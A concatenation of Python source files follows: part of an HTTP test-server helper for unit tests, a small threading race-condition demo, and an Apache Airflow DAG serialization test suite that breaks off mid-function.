addr_queue.put(self.server_port)
with selectors.DefaultSelector() as selector:
selector.register(self, selectors.EVENT_READ)
selector.register(pipe, selectors.EVENT_READ)
while True:
ready = selector.select()
for i in ready:
if i[0].fd != self.fileno():
return self.socket.close()
self._handle_request_noblock()
def start_background(self):
'''
Start the server in the background. Call stop_background to
stop it. Raises AlreadyStarted if called again before
stop_background is called. Returns the server hostname and
port as a tuple.
'''
if self.__server is not False or self.__send is not False:
raise AlreadyStarted()
addr_queue = multiprocessing.Queue()
recv, self.__send = multiprocessing.Pipe()
self.__server = threading.Thread(target=self.serve_forever, args=(addr_queue, recv))
self.__server.start()
return addr_queue.get(True), addr_queue.get(True)
def stop_background(self):
'''
Stop a running server. Raises NotStarted if called before
start_background.
'''
if not self.__server or not self.__send:
raise NotStarted()
self.__send.send('shutdown')
self.__server = False
self.__send = False
class NoServer(object):
'''
Used for setting the test server (ts) to a default value for
the test case.
Example:
def test_something(self, ts=httptest.NoServer()):
'''
def url(self):
'''
NoServer always raises FailedToStart on a call to url()
'''
raise FailedToStart()
class Server(object):
'''
Server is the decorator used on unittest methods.
Example:
class TestJSONServer(httptest.Handler):
def do_GET(self):
self.json([2, 4])
class TestHandlerMethods(unittest.TestCase):
@httptest.Server(TestJSONServer)
def test_json(self, ts=httptest.NoServer()):
with urllib.request.urlopen(ts.url()) as f:
self.assertEqual(f.read().decode("utf-8"), "[2, 4]")
'''
def __init__(self, testServerClass, addr=('127.0.0.1', 0)):
self._class = testServerClass
self._addr = addr
self.server_name = addr[0]
self.server_port = addr[1]
def __call__(self, func, *args, **kwargs):
'''
Starts the HTTPServer runs the test then stops the server
'''
if inspect.iscoroutinefunction(func):
async def wrap(*args, **kwargs):
server = HTTPServer(self._addr, self._class)
self.server_name, self.server_port = server.start_background()
try:
res = await func(*args, ts=self, **kwargs)
except:
server.stop_background()
raise
server.stop_background()
return res
return wrap
else:
def wrap(*args, **kwargs):
server = HTTPServer(self._addr, self._class)
self.server_name, self.server_port = server.start_background()
try:
res = func(*args, ts=self, **kwargs)
except:
server.stop_background()
raise
server.stop_background()
return res
return wrap
def url(self):
'''
Server URL formatted as http://server_name:server_port/
'''
return 'http://{0}:{1}/'.format(self.server_name, self.server_port)
|
mul_questiion.py | import threading
count = 0
def count_fun():
global count
for _ in range(1000000):
count += 1
threading_list = []
t1 = threading.Thread(target=count_fun)
t2 = threading.Thread(target=count_fun)
threading_list.append(t1)
threading_list.append(t2)
list(map(lambda x: x.start(), threading_list))
list(map(lambda t: t.join(), threading_list))
print(f"主线程运行结束。count is : {count}")
|
test_dag_serialization.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
dag_field = getattr(dag, field)
if isinstance(dag_field, list):
dag_field = sorted(dag_field)
assert getattr(serialized_dag, field) == dag_field, f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.schedule_interval == expected_schedule_interval
assert dag.normalized_schedule_interval == expected_n_schedule_interval
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks", "has_on_success_callback", "has_on_failure_callback"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
